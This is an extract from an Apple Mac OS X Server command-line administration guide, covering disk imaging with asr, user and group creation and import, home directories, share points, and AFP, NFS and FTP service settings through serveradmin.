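$ sudo diskutil eraseVolume "Case-sensitive HFS+" CaseSensitive /Volumes/Scratch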
Imaging and Cloning Volumes Using ASR
You can use Apple Software Restore (ASR) to copy a disk image onto a volume or prepare existing disk images with checksum information for faster copies. ASR can perform file copies, in which individual files are restored to a volume unless an identical file is already there, and block copies, which restore entire disk images.
The asr utility doesn't create the disk images. You can use hdiutil to create disk images from volumes or folders. You must run ASR as the root user or using sudo. You cannot use ASR on read/write disk images.
To image a boot volume:
1 Install and configure Mac OS X on the volume as you want it.
2 Restart from a different volume.
3 Make sure the volume you're imaging has permissions enabled.
4 Use hdiutil to make a read-write disk image of the volume.
5 Mount the disk image.
6 Remove cache files, host-specific preferences, and virtual memory files. You can find example files to remove on the asr man page.
7 Unmount the volume and convert the read-write image to a read-only compressed image.
hdiutil convert -format UDZO pathtoimage -o compressedimage
8 Prepare the image for duplication by adding checksum information:
sudo asr -imagescan compressedimage
To restore a volume from an image:
$ sudo asr -source compressedimage -target targetvolume -erase
See the asr man page for command syntax, limitations, and image preparation instructions.

7 Working With Users and Groups
Commands you can use to set up and manage users and groups in Mac OS X Server.

Creating Server Administrator Users
You can use the serversetup command to create administrator users for a server. To create regular users, see "Importing Users and Groups" on page 54.
To create a user:
$ serversetup -createUser fullname shortname password
The name, short name, and password must be typed in the order shown. If the full name includes spaces, type it in quotes. The command displays a 1 if the full name or short name is already in use.
To create a user with a specific UID:
$ serversetup -createUserWithID fullname shortname password userid
The name, short name, password, and UID must be typed in the order shown. If the full name includes spaces, type it in quotes. The command displays a 1 if the full name, short name, or UID is already in use or if the UID you specified is less than 100.
To create a user with a specific UID and home directory:
$ serversetup -createUserWithIDIP fullname shortname password userid homedirpath
The name, short name, password, and UID must be typed in the order shown. If the full name includes spaces, type it in quotes. The command displays a 1 if the full name, short name, or UID is already in use or if the UID you specified is less than 100.

Importing Users and Groups
You can use the dsimportexport command to import user and group accounts.
Note: Despite its name, dsimportexport can't be used to export user records.
The utility is in /Applications/Server/Workgroup Manager.app/Contents/Resources. For information on the formats of the files you can import, see "Creating a Character-Delimited User Import File" on page 55.
$ dsimportexport (-g|-s|-p) file directory user password (O|M|I|A) [options] To import users and groups: 1 Create a file containing the accounts to import, and place it in a location accessible from the importing server. You can export this file from an earlier version of Mac OS X Server or AppleShare IP 6.3, or create your own character-delimited file. See “Creating a Character-Delimited User Import File” on page 55. Open Directory supports up to 100,000 records. For local NetInfo databases, make sure the file contains no more than 10,000 records. 2 Log in as the administrator of the directory domain into which you want to import accounts. Parameter Description -g|-s|-p You must specify one of these to indicate the type of file you’re importing: -g for a character-delimited file -s for an XML file exported from Users & Groups in Mac OS X Server version 10.1.x -p for an XML file exported from AppleShare IP version6.x file The path of the file to import. directory The path to the Open Directory node where the records will be added. user The name of the directory administrator. password The password of the directory administrator. O|M|I|A Specifies how user data is handled if a record for an imported user already exists in the directory: O: Overwrite the matching record. M: Merge the records. Empty attributes in the directory assume values from the imported record. I: Ignore imported record and leave existing record unchanged. A: Append data from import record to existing record. options Additional command options. To see available options, execute the dsimportexport command with no parameters. LL2354.book Page 54 Monday, October 20, 2003 9:47 AM Chapter 7 Working With Users and Groups 55 3 Open the Terminal application and type the dsimportexport command. The tool is located in /Applications/Utilities/Workgroup Manager.app/Contents/Resources. To include the space in the path name, precede it with a backslash (\). For example: /Applications/Utilities/Workgroup\ Manager.app/Contents/Resources /dsimportexport -h 4 If you want, use the createhomedir tool to create home directories for imported users. See “Creating a User’s Home Directory” on page 63. Creating a Character-Delimited User Import File You can create a character-delimited file by hand, using a script, or by using a database or spreadsheet application. The first record in the file, the record description, describes the format of each account record in the file. There are three options for the record description: • Write a full record description • Use the shorthand StandardUserRecord • Use the shorthand StandardGroupRecord The other records in the file describe user or group accounts, encoded in the format described by the record description. Any line of a character-delimited file that begins with “#” is ignored during importing. Writing a Record Description The record description specifies the fields in each record in the character-delimited file, specifies the delimiting characters, and specifies the escape character that precedes special characters in a record. 
Encode the record description using the following elements in the order specified, separating them with a space: • End-of-record indicator (in hex notation) • Escape character (in hex notation) • Field separator (in hex notation) • Value separator (in hex notation) • Type of accounts in the file (DSRecTypeStandard:Users or DSRecTypeStandard:Groups) • Number of attributes in each account record • List of attributes For user accounts, the list of attributes must include the following, although you can omit UID and PrimaryGroupID if you specify a starting UID and a default primary group ID when you import the file: • RecordName (the user’s short name) • Password • UniqueID (the UID) • PrimaryGroupID • RealName (the user’s full name) LL2354.book Page 55 Monday, October 20, 2003 9:47 AM 56 Chapter 7 Working With Users and Groups In addition, you can include • UserShell (the default shell) • NFSHomeDirectory (the path to the user’s home directory on the user’s computer) • Other user data types, described under “User Attributes” on page 57 For group accounts, the list of attributes must include • RecordName (the group name) • PrimaryGroupID (the group ID) • GroupMembership Here is an example of a record description: 0x0A 0x5C 0x3A 0x2C DSRecTypeStandard:Users 7 RecordName Password UniqueID PrimaryGroupID RealName NFSHomeDirectory UserShell Here is an example of a record encoded using the above description: jim:Adl47E$:408:20:J. Smith, Jr., M.D.:/Network/Servers/somemac/Homes/jim:/bin/csh The record consists of values, delimited by colons. Use a double colon (::) to indicate a value is missing. Here is another example, which shows a record description and user records for users whose passwords are to be validated using the Password Server. The record description should include a field named dsAttrTypeStandard:AuthMethod, and the value of this field for each record should be dsAuthMethodStandard:dsAuthClearText: 0x0A 0x5C 0x3A 0x2C dsRecTypeStandard:Users 8 dsAttrTypeStandard:RecordName dsAttrTypeStandard:AuthMethod dsAttrTypeStandard:Password dsAttrTypeStandard:UniqueID dsAttrTypeStandard:PrimaryGroupID dsAttrTypeStandard:Comment dsAttrTypeStandard:RealName dsAttrTypeStandard:UserShell skater:dsAuthMethodStandard\:dsAuthClearText:pword1:374:11:comment: Tony Hawk:/bin/csh mattm:dsAuthMethodStandard\:dsAuthClearText:pword2:453:161:: Matt Mitchell:/bin/tcsh As these examples illustrate, you can use the prefix dsAttrTypeStandard: when referring to an attribute, or you can omit the prefix. Using the StandardUserRecord Shorthand When the first record in a character-delimited import file contains StandardUserRecord, the following record description is assumed: 0x0A 0x5C 0x3A 0x2C DSRecTypeStandard:Users 7 RecordName Password UniqueID PrimaryGroupID RealName NFSHomeDirectory UserShell LL2354.book Page 56 Monday, October 20, 2003 9:47 AM Chapter 7 Working With Users and Groups 57 An example user account looks like this: jim:Adl47E$:408:20:J. Smith, Jr., M.D.:/Network/Servers/somemac/Homes/jim:/bin/csh Using the StandardGroupRecord Shorthand When the first record in a character-delimited import file contains StandardGroupRecord, the following record description is assumed: 0x0A 0x5C 0x3A 0x2C DSRecTypeStandard:Groups 4 RecordName Password PrimaryGroupID GroupMembership Here is an example of a record encoded using the description: students:Ad147:88:jones,alonso,smith,wong User Attributes The following table lists standard XML data structures for attributes in user records. 
Attribute Format Sample values RecordName: A list of names associated with a user; the first is the user’s short name, which is also the name of the user’s home directory Important: All attributes used for authentication must map to RecordName. First value: ASCII characters A–Z, a–z, 0–9, _,- Second value: UTF-8 Roman text Dave David Mac DMacSmith Non-zero length, 1 to 16 values. Maximum 255 bytes (85 triple-byte to 255 single-byte characters) per instance. First value must be 1 to 30 bytes for clients using Macintosh Manager, or 1 to 8 bytes for clients using Mac OS X version 10.1 and earlier. RealName: A single name, usually the user’s full name; not used for authentication UTF-8 text David L. MacSmith, Jr. Non-zero length, maximum 255 bytes (85 triple-byte to 255 single-byte characters). UniqueID: A unique user identifier, used for access privilege management Signed 32-bit ASCII string of digits 0–9 Range is 100 to 2,147,483,648. Values below 100 are typically used for system accounts. Zero is reserved for use by the system. Normally unique among entire population of users, but sometimes can be duplicated. Warning: A non-integer value is interpreted as 0, which is the UniqueID of the root user. PrimaryGroupID: A user’s primary group association Unsigned 32-bit ASCII string of digits 0–9 Range is 1 to 2,147,483,648. Normally unique among entire population of group records. If blank, 20 is assumed. NFSHomeDirectory: Local file system path to the user’s home directory UTF-8 text /Network/Servers/example/Users/ K-M/Tom King Non-zero length. Maximum 255 bytes. LL2354.book Page 57 Monday, October 20, 2003 9:47 AM 58 Chapter 7 Working With Users and Groups HomeDirectory: The location of an AFP-based home directory Structured UTF-8 text <home_dir> <url> afp://server/sharepoint </url> <path> usershomedirectory </path> </home_dir> In the following example, Tom King’s home directory is K-M/Tom King, which resides beneath the share point directory, Users: <home_dir> <url> afp://example.com/Users </url> <path> K-M/Tom King </path> </home_dir> HomeDirectoryQuota: The disk quota for the user’s home directory Text for the number of bytes allowed If the quota is 10MB, the value will be the text string 1048576. MailAttribute: A user’s mail service configuration (refer to “Mail Attributes in User Records” on page 60 for information on individual fields in this structure) Structured text <dict> <key>kAttributeVersion</key> <string>Apple Mail 1.0</string> <key>kAutoForwardValue</key> <string>user@example.com</string> <key>kIMAPLoginState</key> <string>IMAPAllowed</string> <key>kMailAccountLocation</key> <string>domain.example.com</string> <key>kMailAccountState</key> <string>Enabled</string> <key>kNotificationState</key> <string>NotificationStaticIP</string> <key>kNotificationStaticIPValue</key> <string>[1.2.3.4]</string> <key>kPOP3LoginState</key> <string>POP3Allowed</string> <key>kSeparateInboxState</key> <string>OneInbox</string> <key>kShowPOP3InboxInIMAP</key> <string>HidePOP3Inbox</string> </dict> PrintServiceUserData A user’s print quota statistics UTF-8 XML plist, single value Attribute Format Sample values LL2354.book Page 58 Monday, October 20, 2003 9:47 AM Chapter 7 Working With Users and Groups 59 MCXFlags: If present, MCXSettings is loaded; if absent, MCXSettings isn’t loaded; required for a managed user. 
UTF-8 XML plist, single value MCXSettings: A user’s managed preferences UTF-8 XML plist, single value AdminLimits The privileges allowed by Workgroup Manager to a user that can administer the directory domain UTF-8 XML plist, single value Password: The user’s password UNIX crypt Picture: File path to a recognized graphic file to be used as a display picture for the user UTF-8 text Maximum 32,676 bytes. Comment: Any documentation you like UTF-8 text John is in charge of product marketing. UserShell: The location of the default shell for command-line interactions with the server Path name /bin/tcsh /bin/sh None (this value prevents users with accounts in the directory domain from accessing the server remotely via a command line) Non-zero length. Authentication Authority: Describes the user’s authentication methods, such as Open Directory or crypt password; not required for a user with only a crypt password; absence of this attribute signifies legacy authentication (crypt with Authentication Manager, if it’s available). ASCII text Values describe the user’s authentication methods. Can be multivalued (for example, basic and ShadowHash). Each value has the format vers; tag; data (where vers and data may be blank). Crypt password: ;basic; Open Directory authentication: ;ApplePasswordServer; HexID, server’s public key IPaddress:port Shadow password (local directory domain only): ;ShadowHash; AuthenticationHint: Text set by the user to be displayed as a password reminder UTF-8 text Your guess is as good as mine. Maximum 255 bytes. Attribute Format Sample values LL2354.book Page 59 Monday, October 20, 2003 9:47 AM 60 Chapter 7 Working With Users and Groups Mail Attributes in User Records The following table lists the standard XML data structures for a user mail attribute, part of a standard user record. MailAttribute field Description Sample values AttributeVersion A required case-insensitive value that must be set to AppleMail 1.0. <key> kAttributeVersion </key> <string> AppleMail 1.0 </string> MailAccountState A required case-insensitive keyword describing the state of the user’s mail. It must be set to one of these values: Off, Enabled, or Forward. <key> kMailAccountState </key> <string> Enabled </string> POP3LoginState A required case-insensitive keyword indicating whether the user is allowed to access mail via POP. It must be set to one of these values: POP3Allowed or POP3Deny. <key> kPOP3LoginState </key> <string> POP3Deny </string> IMAPLoginState A required case-insensitive keyword indicating whether the user is allowed to access mail using IMAP. It must be set to one of these values: IMAPAllowed or IMAPDeny. <key> kIMAPLoginState </key> <string> IMAPAllowed </string> MailAccountLocation A required value indicating the domain name or IP address of the ProductName responsible for storing the user’s mail. <key> kMailAccountLocation </key> <string> domain.example.com </string> AutoForwardValue A required field only if MailAccountState has the value Forward. The value must be a valid RFC 822 email address. <key> kAutoForwardValue </key> <string> user@example.com </string> LL2354.book Page 60 Monday, October 20, 2003 9:47 AM Chapter 7 Working With Users and Groups 61 NotificationState An optional keyword describing whether to notify the user whenever new mail arrives. If provided, it must be set to one of these values: NotificationOff, NotificationLastIP, or NotificationStaticIP. If this field is missing, NotificationOff is assumed. 
<key>kNotificationState</key> <string>NotificationOff</string>
NotificationStaticIPValue: An optional IP address, in bracketed, dotted decimal format ([xxx.xxx.xxx.xxx]). If this field is missing, NotificationState is interpreted as NotificationLastIP. The field is used only when NotificationState has the value NotificationStaticIP. Sample value: <key>kNotificationStaticIPValue</key> <string>[1.2.3.4]</string>
SeparateInboxState: An optional case-insensitive keyword indicating whether the user manages POP and IMAP mail using different inboxes. If provided, it must be set to one of these values: OneInbox or DualInbox. If this value is missing, the value OneInbox is assumed. Sample value: <key>kSeparateInboxState</key> <string>OneInbox</string>
ShowPOP3InboxInIMAP: An optional case-insensitive keyword indicating whether POP messages are displayed in the user's IMAP folder list. If provided, it must be set to one of these values: ShowPOP3Inbox or HidePOP3Inbox. If this field is missing, the value ShowPOP3Inbox is assumed. Sample value: <key>kShowPOP3InboxInIMAP</key> <string>HidePOP3Inbox</string>

Checking a Server User's Name, UID, or Password
You can use the following commands to check the name, UID, or password of a user in the server's local directory.
Note: These tasks only apply to the local directory on the server.
To see if a full name is already in use:
$ serversetup -verifyRealName "longname"
The command displays a 1 if the name is already in the directory, 0 if it isn't.
To see if a short name is already in use:
$ serversetup -verifyName shortname
The command displays a 1 if the name is already in the directory, 0 if it isn't.
To see if a UID is already in use:
$ serversetup -verifyUID userid
The command displays a 1 if the UID is already in the directory, 0 if it isn't.
To test a user's password:
$ serversetup -verifyNamePassword shortname password
The command displays a 1 if the password is good, 0 if it isn't.
To view the names associated with a UID:
$ serversetup -getNamesByID userid
No response means the UID isn't valid.
To generate the default UNIX short name for a user long name:
$ serversetup -getUNIXName "longname"

Creating a User's Home Directory
Normally, you can create a user's home directory by clicking the Create Home Now button on the Homes pane of Workgroup Manager. You can also create home directory folders using the createhomedir tool. Otherwise, Mac OS X Server creates the user's home directory when the user logs in for the first time.
You can use createhomedir to create
• A home directory for a particular user (-u option)
• Home directories for all users in a directory domain (-n or -l option)
• Home directories for all users in all domains in the directory search path (-a option)
For more information, type man createhomedir to view the man page. In all cases, the home directories are created on the server where you run the tool.
To create a home directory for a particular user:
$ createhomedir [(-a|-l|-n domain)] -u userid
To create home directories for all users in the local domain:
$ createhomedir -l
To create home directories for all users in all domains in the directory search path:
$ createhomedir -a
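As an illustration, a hypothetical sequence for adding an account for Jane Smith might first confirm that the desired short name and UID are unused, create the account, and then create its home directory in the local domain (the name, short name, password, and UID shown are all illustrative, and the -u argument follows the userid placeholder in the syntax above):
$ serversetup -verifyName jane
0
$ serversetup -verifyUID 1200
0
$ sudo serversetup -createUserWithID "Jane Smith" jane mypass 1200
$ sudo createhomedir -l -u jane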
You can also create a user's home directory using the serversetup tool.
To create a home directory for a particular user:
$ serversetup -createHomedir userid
The command displays a 1 if the user ID you specify doesn't exist.

Mounting a User's Home Directory
You can use the mnthome command to mount a user's home directory. For more information, see the man page.

Creating a Group Folder
You can use the CreateGroupFolder command to set up group folders. For more information, see the man page.

Checking a User's Administrator Privileges
To see if a user is a server administrator:
$ serversetup -isAdministrator shortname
The command displays a 1 if the user has administrator privileges, 0 if the user doesn't.

8 Working With File Services
Commands you can use to create share points and manage AFP, NFS, Windows (SMB), and FTP services in Mac OS X Server.

Share Points
You can use the sharing tool to list, create, and modify share points.

Listing Share Points
To list existing share points:
$ sharing -l
In the resulting list, there's a section of properties similar to the following for each share point defined on the server. (1 = yes, true, or enabled. 0 = false, no, or disabled.)
name: Share1
path: /Volumes/100GB
afp: {
 name: Share1
 shared: 1
 guest access: 0
 inherit perms: 0
}
ftp: {
 name: Share1
 shared: 1
 guest access: 1
}
smb: {
 name: Share1
 shared: 1
 guest access: 1
 inherit perms: 0
 oplocks: 0
 strict locking: 0
 directory mask: 493
 create mask: 420
}

Creating a Share Point
To create a share point:
$ sharing -a path [-n customname] [-A afpname] [-F ftpname] [-S smbname] [-s shareflags] [-g guestflags] [-i inheritflags] [-c creationmask] [-d directorymask] [-o oplockflag] [-t strictlockingflag]
Examples
$ sharing -a /Volumes/100GB/Art
Creates a share point named Art, shared using AFP, FTP, and SMB, and using the name Art for all three types of clients.
$ sharing -a /Volumes/100GB/Windows\ Docs -n WinDocs -S Documents -s 001 -o 1
Parameters:
path: The full path to the directory you want to share.
customname: The name of the share point. If you don't specify this custom name, it's set to the name of the directory, the last name in path.
afpname: The share point name shown to and used by AFP clients. This name is separate from the share point name.
ftpname: The share point name shown to and used by FTP clients.
smbname: The share point name shown to and used by SMB clients.
shareflags: A three-digit binary number indicating which protocols are used to share the directory. The digits represent, from left to right, AFP, FTP, and SMB. 1=shared, 0=not shared.
guestflags: A group of three flags indicating which protocols allow guest access. The flags are written as a three-digit binary number with the digits representing, from left to right, AFP, FTP, and SMB. 1=guests allowed, 0=guests not allowed.
inheritflags: A group of two flags indicating whether new items in AFP or SMB share points inherit the ownership and access permissions of the parent folder. The flags are written as a two-digit binary number with the digits representing, from left to right, AFP and SMB. 1=inherit, 0=don't inherit.
creationmask: The SMB creation mask. Default=0644.
directorymask: The SMB directory mask. Default=0755.
oplockflag: Specifies whether opportunistic locking is allowed for an SMB share point. 1=enable oplocks, 0=disable oplocks.
For more information on oplocks, see the file services administration guide. strictlockingflag Specifies whether strict locking is used on an SMB share point. 1=enable strict locking, 0=disable. For more information on strict locking, see the file services administration guide. LL2354.book Page 66 Monday, October 20, 2003 9:47 AM Chapter 8 Working With File Services 67 Shares the directory named Windows Docs on the disk 100GB. The share point is named WinDocs for server management purposes, but SMB users see it as Documents. It’s shared using only the SMB protocol with oplocks enabled. Modifying a Share Point To change share point settings: $ sharing -e sharepointname [-n customname] [-A afpname] [-F ftpname] [-S smbname] [-s shareflags] [-g guestflags] [-i inheritflags] [-c creationmask] [-d directorymask] [-o oplockflag] [-t strictlockingflag] Disabling a Share Point To disable a share point: $ sharing -r sharepointname AFP Service Starting and Stopping AFP Service To start AFP service: $ sudo serveradmin start afp To stop AFP service: $ sudo serveradmin stop afp Checking AFP Service Status To see if AFP service is running: $ sudo serveradmin status afp To see complete AFP status: $ sudo serveradmin fullstatus afp Viewing AFP Settings To list all AFP service settings: $ sudo serveradmin settings afp Parameter Description sharepointname The current name of the share point. Other parameters See the parameter descriptions under “Creating a Share Point” on page 66. Parameter Description sharepointname The current name of the share point. LL2354.book Page 67 Monday, October 20, 2003 9:47 AM 68 Chapter 8 Working With File Services To list a particular setting: $ sudo serveradmin settings afp:setting To list a group of settings: You can list a group of settings that have part of their names in common by typing only as much of the name as you want, stopping at a colon (:), and typing an asterisk (*) as a wildcard for the remaining parts of the name. For example, $ sudo serveradmin settings afp:loggingAttributes:* Changing AFP Settings You can change AFP service settings using the serveradmin command. To change a setting: $ sudo serveradmin settings afp:setting = value To change several settings: $ sudo serveradmin settings afp:setting = value afp:setting = value afp:setting = value [...] Control-D List of AFP Settings The following table lists AFP settings as they appear using serveradmin. Parameter Description setting Any of the AFP service settings. For a complete list of settings, type serveradmin settings afp or see “List of AFP Settings” on this page. Parameter Description setting An AFP service setting. To see a list of available settings, type $ sudo serveradmin settings afp or see “List of AFP Settings” on this page. value An appropriate value for the setting. Enclose text strings in double quotes (for example, "text string"). Parameter (afp:) Description activityLog Turn activity logging on or off. Default = no activityLogPath Location of the activity log file. Default = /Library/Logs/AppleFileService/ AppleFileServiceAccess.log LL2354.book Page 68 Monday, October 20, 2003 9:47 AM Chapter 8 Working With File Services 69 activityLogSize Rollover size (in kilobytes) for the activity log. Only used if activityLogTime isn’t specified. Default = 1000 activityLogTime Rollover time (in days) for the activity log. Default = 7 admin31GetsSp Set to true to force administrative users on Mac OS X to see share points instead of all volumes. 
Default = yes adminGetsSp Set to true to force administrative users on Mac OS 9 to see share points instead of all volumes. Default = no afpServerEncoding Encoding used with Mac OS 9 clients. Default = 0 afpTCPPort TCP port used by AFP on server. Default = 548 allowRootLogin Allow user to log in as root. Default = no attemptAdminAuth Allow an administrator user to masquerade as another user. Default = yes authenticationMode Authentication mode. Can be: standard kerberos standard_and_kerberos Default = "standard_and_kerberos" autoRestart Whether the AFP service should restart automatically when abnormally terminated. Default = yes clientSleepOnOff Allow client computers to sleep. Default = yes clientSleepTime Time (in hours) that clients are allowed to sleep. Default = 24 createHomeDir Create home directories. Default = yes errorLogPath The location of the error log. Default = /Library/Logs/AppleFileService/ AppleFileServiceError.log errorLogSize Rollover size (in kilobytes) for the error log. Only used if errorLogTime isn’t specified. Default = 1000 errorLogTime Rollover time (in days) for the error log. Default = 0 Parameter (afp:) Description LL2354.book Page 69 Monday, October 20, 2003 9:47 AM 70 Chapter 8 Working With File Services guestAccess Allow guest users access to the server. Default = yes idleDisconnectFlag: adminUsers Enforce idle disconnect for administrative users. Default = yes idleDisconnectFlag: guestUsers Enforce idle disconnect for guest users. Default = yes idleDisconnectFlag: registeredUsers Enforce idle disconnect for registered users. Default = yes idleDisconnectFlag: usersWithOpenFiles Enforce idle disconnect for users with open files. Default = yes idleDisconnectMsg The idle disconnect message. Default = "" idleDisconnectOnOff Enable idle disconnect. Default = no idleDisconnectTime Idle time (in minutes) allowed before disconnect. Default = 10 kerberosPrincipal Kerberos server principal name. Default = "afpserver" loggingAttributes: logCreateDir Record directory creations in the activity log. Default = yes loggingAttributes: logCreateFile Record file creations in the activity log. Default = yes loggingAttributes: logDelete Record file deletions in the activity log. Default = yes loggingAttributes: logLogin Record user logins in the activity log. Default = yes loggingAttributes: logLogout Log user logouts in the activity log. Default = yes loggingAttributes: logOpenFork Log file opens in the activity log. Default = yes loginGreeting The login greeting message. Default = "" loginGreetingTime The last time the login greeting was set or updated. maxConnections Maximum number of simultaneous user sessions allowed by the server. Default = -1 (unlimited) maxGuests Maximum number of simultaneous guest users allowed. Default = -1 (unlimited) Parameter (afp:) Description LL2354.book Page 70 Monday, October 20, 2003 9:47 AM Chapter 8 Working With File Services 71 maxThreads Maximum number of AFP threads. (Must be specified at startup.) Default = 40 noNetworkUsers Indication to client that all users are users on the server. Default = no permissionsModel How permissions are enforced. Can be set to: classic_permissions unix_with_classic_admin_permissions unix_permissions Default = "classic_permissions" recon1SrvrKeyTTLHrs Time-to-live (in hours) for the server key used to generate reconnect tokens. Default = 168 recon1TokenTTLMins Time-to-live (in minutes) for a reconnect token. Default = 10080 reconnectFlag Allow reconnect options. 
Can be set to: none all no_admin_kills Default = "all" reconnectTTLInMin Time-to-live (in minutes) for a disconnected session waiting reconnection. Default = 1440 registerAppleTalk Advertise the server using AppleTalk NBP. Default = yes registerNSL Advertise the server using Rendezvous. Default = yes sendGreetingOnce Send the login greeting only once. Default = no shutdownThreshold Don’t modify. Internal use only. specialAdminPrivs Grant administrative users super user read/write privileges. Default = no SSHTunnel Allow SSH tunneling. Default = yes TCPQuantum TCP message quantum. Default = 262144 tickleTime Frequency of tickles sent to client. Default = 30 updateHomeDirQuota Enforce quotas on the users volume. Default = yes Parameter (afp:) Description LL2354.book Page 71 Monday, October 20, 2003 9:47 AM 72 Chapter 8 Working With File Services List of AFP serveradmin Commands In addition to the standard start, stop, status, and settings commands, you can use serveradmin to issue the following service-specific AFP commands. Listing Connected Users You can use the serveradmin getConnectedUsers command to retrieve information about connected AFP users. In particular, you can use this command to retrieve the session IDs you need to disconnect or send messages to users. To list connected users: $serveradmin command afp:command = getConnectedUsers Output The following array of settings is displayed for each connected user: afp:usersArray:_array_index:i:disconnectID = <disconnectID> afp:usersArray:_array_index:i:flags = <flags> afp:usersArray:_array_index:i:ipAddress = <ipAddress> afp:usersArray:_array_index:i:lastUseElapsedTime = <lastUseElapsed> afp:usersArray:_array_index:i:loginElapsedTime = <loginElapsedTime> afp:usersArray:_array_index:i:minsToDisconnect = <minsToDisconnect> afp:usersArray:_array_index:i:name = <name> afp:usersArray:_array_index:i:serviceType = <serviceType> afp:usersArray:_array_index:i:sessionID = <sessionID> afp:usersArray:_array_index:i:sessionType = <sessionType> afp:usersArray:_array_index:i:state = <state> useAppleTalk Don’t modify. Internal use only. useHomeDirs Default = no Parameter (afp:) Description Command (afp:command=) Description cancelDisconnect Cancel a pending user disconnect. See “Canceling a User Disconnect” on page 74. disconnectUsers Disconnect AFP users. See “Disconnecting AFP Users” on page 73. getConnectedUsers List settings for connected users. See “Listing Connected Users” on this page. getHistory View a periodic record of file data throughput or number of user connections. See “Listing AFP Service Statistics” on page 75. getLogPaths Display the locations of the AFP service activity and error logs. sendMessage Send a text message to connected AFP users. See “Sending a Message to AFP Users” on page 73. syncSharePoints Update share point information after changing settings. writeSettings Equivalent to the standard serveradmin settings command, but also returns a setting indicating whether the service needs to be restarted. See “Determining Whether a Service Needs to be Restarted” on page 19. LL2354.book Page 72 Monday, October 20, 2003 9:47 AM Chapter 8 Working With File Services 73 Sending a Message to AFP Users You can use the serveradmin sendMessage command to send a text message to connected AFP users. Users are specified by session ID. 
To send a message: $ sudo serveradmin command afp:command = sendMessage afp:message = "message-text" afp:sessionIDsArray:_array_index:0 = sessionid1 afp:sessionIDsArray:_array_index:1 = sessionid2 afp:sessionIDsArray:_array_index:2 = sessionid3 [...] Control-D Disconnecting AFP Users You can use the serveradmin disconnectUsers command to disconnect AFP users. Users are specified by session ID. You can specify a delay time before disconnect and a warning message. To disconnect users: $ sudo serveradmin command afp:command = disconnectUsers afp:message = "message-text" afp:minutes = minutes-until afp:sessionIDsArray:_array_index:0 = sessionid1 afp:sessionIDsArray:_array_index:1 = sessionid2 afp:sessionIDsArray:_array_index:2 = sessionid3 [...] Control-D Parameter Description message-text The message that appears on client computers. sessionidn The session ID of a user you want to receive the message. To list the session IDs of connected users, use the getConnectedUsers command. See “Listing Connected Users” on page 72. Parameter Description message-text The text of a message that appears on client computers in the disconnect announcement dialog. minutes-until The number of minutes between the time the command is issued and the users are disconnected. sessionidn The session ID of a user you want to disconnect. To list the session IDs of connected users, use the getConnectedUsers command. See “Listing Connected Users” on page 72. LL2354.book Page 73 Monday, October 20, 2003 9:47 AM 74 Chapter 8 Working With File Services Output afp:command = "disconnectUsers" afp:messageSent = "<message>" afp:timeStamp = "<time>" afp:timerID = <disconnectID> <user listing> afp:status = <status> Canceling a User Disconnect You can use the serveradmin cancelDisconnect command to cancel a disconnectUsers command. Users receive an announcement that they’re no longer scheduled to be disconnected. To cancel a disconnect: $ sudo serveradmin command afp:command = cancelDisconnect afp:timerID = timerID Control-D Output afp:command = "cancelDisconnect" afp:timeStamp = "<time>" afp:status = <status> Value Description <message> The message sent to users in the disconnect announcement dialog. <time> The time when the command was issued. <disconnectID> An integer that identifies this particular disconnect. You can use this ID with the cancelDisconnect command to cancel the disconnect. <user listing> A standard array of user settings for each user scheduled for disconnect. For a description of these settings, see “Listing Connected Users” on page 72. <status> A command status code: 0 = command successful Parameter Description timerID The integer value of the afp:timerID parameter output when you issued the disconnectUsers command. You can also find this number by listing any user scheduled to be disconnected and looking at the value of the disconnectID setting for the user. Value Description <time> The time at which the command was issued. <status> A command status code: 0 = command successful LL2354.book Page 74 Monday, October 20, 2003 9:47 AM Chapter 8 Working With File Services 75 Listing AFP Service Statistics You can use the serveradmin getHistory command to display a log of periodic samples of the number of connections and the data throughput. Samples are taken once each minute. 
To list samples:
$ sudo serveradmin command
afp:command = getHistory
afp:variant = statistic
afp:timeScale = scale
Control-D
Output
afp:nbSamples = <samples>
afp:samplesArray:_array_index:0:vn = <sample>
afp:samplesArray:_array_index:0:t = <time>
afp:samplesArray:_array_index:1:vn = <sample>
afp:samplesArray:_array_index:1:t = <time>
[...]
afp:samplesArray:_array_index:i:vn = <sample>
afp:samplesArray:_array_index:i:t = <time>
afp:vnLegend = "<legend>"
afp:currentServerTime = <servertime>
Parameters:
statistic: The value you want to display. Valid values: v1 (number of connected users, averaged during the sampling period) or v2 (throughput in bytes/sec).
scale: The length of time in seconds, ending with the current time, for which you want to see samples. For example, to see 30 minutes of data, you would specify afp:timeScale = 1800.
Values displayed by getHistory:
<samples>: The total number of samples listed.
<legend>: A textual description of the selected statistic: "CONNECTIONS" for v1, "THROUGHPUT" for v2.
<sample>: The numerical value of the sample. For connections (v1), this is the integer average number of users. For throughput (v2), this is integer bytes per second.
<time>: The time at which the sample was measured, as a standard UNIX time (number of seconds since Jan 1, 1970). Samples are taken every 60 seconds.

Viewing AFP Log Files
You can use tail or any other file listing tool to view the contents of the AFP service logs.
To view the latest entries in a log:
$ tail log-file
You can use the serveradmin getLogPaths command to see where the current AFP error and activity logs are located.
To display the log paths:
$ sudo serveradmin command afp:command = getLogPaths
Output
afp:accesslog = <access-log>
afp:errorlog = <error-log>
Values:
<access-log>: The location of the AFP service access log. Default = /Library/Logs/AppleFileService/AppleFileServiceAccess.log
<error-log>: The location of the AFP service error log. Default = /Library/Logs/AppleFileService/AppleFileServiceError.log

NFS Service

Starting and Stopping NFS Service
NFS service is started automatically when a share point is exported using NFS. The NFS daemons that satisfy client requests continue to run until there are no more NFS exports and the server is restarted.

Checking NFS Service Status
To see if NFS service and related processes are running:
$ sudo serveradmin status nfs
To see complete NFS status:
$ sudo serveradmin fullstatus nfs

Viewing NFS Settings
To list all NFS service settings:
$ sudo serveradmin settings nfs
To list a particular setting:
$ sudo serveradmin settings nfs:setting

Changing NFS Service Settings
Use the following parameters with the serveradmin command to change settings for the NFS service. (Parameter names are prefixed with nfs: when used with serveradmin.)
nbDaemons: Default = 6. To reduce the number of daemons, you must restart the server after changing this value.
useTCP: Default = yes. You must restart the server after changing this value.
useUDP: Default = yes. You must restart the server after changing this value.
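For example, a hypothetical change that raises the number of NFS daemons and disables UDP might look like this (the values are illustrative, and as noted in the parameter list above these changes take effect only after the server is restarted):
$ sudo serveradmin settings nfs:nbDaemons = 12
$ sudo serveradmin settings nfs:useUDP = no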
FTP Service

Starting FTP Service
To start FTP service:
$ sudo serveradmin start ftp

Stopping FTP Service
To stop FTP service:
$ sudo serveradmin stop ftp

Checking FTP Service Status
To see if FTP service is running:
$ sudo serveradmin status ftp
To see complete FTP status:
$ sudo serveradmin fullstatus ftp

Viewing FTP Settings
